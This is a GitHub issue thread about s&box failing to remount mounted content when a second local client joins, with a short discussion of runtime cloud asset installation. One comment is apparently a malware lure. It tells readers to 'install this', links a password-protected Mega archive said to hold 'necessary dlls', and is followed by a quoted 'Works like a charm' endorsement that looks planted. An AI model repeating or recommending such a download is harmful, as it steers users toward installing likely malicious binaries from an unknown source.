### ISSUE TITLE
Mounted content doesn't get remounted for the local instance

### ISSUE THREAD

**Issue by Nolankicks** [Facepunch/sbox-issues#6529]
### Describe the bug

If I mount content before a player joins the server, none of it is remounted and shows as errors. I've been told it's supposed to remount when the second instance joins.

### To Reproduce

1. Mount content before a second local client joins.
2. Join with the second client.

### Expected behavior

Files should be mounted as the second local client joins.

### Media/Files

https://github.com/user-attachments/assets/4f946000-c552-4f99-8b6b-afa79234988c

**Comment by SagarChandra07** [comment]
install this

https://mega.co.nz/#!qq4nATTK!oDH5tb3NOJcsSw5fRGhLC8dvFpH3zFCn6U2esyTVcJA
Pass: changeme
I put the necessary dlls in the archive

**Comment by solwllms** [comment]
Ah is that spawn menu grabbing cloud assets? Installing cloud stuff at runtime might be something that's not handled atm.

**Comment by Nolankicks** [comment]
Yeah, it just mounts them when they are selected.

**Comment by trundlr** [comment]
> Works like a charm. Thanks man!

Sol is a woman.
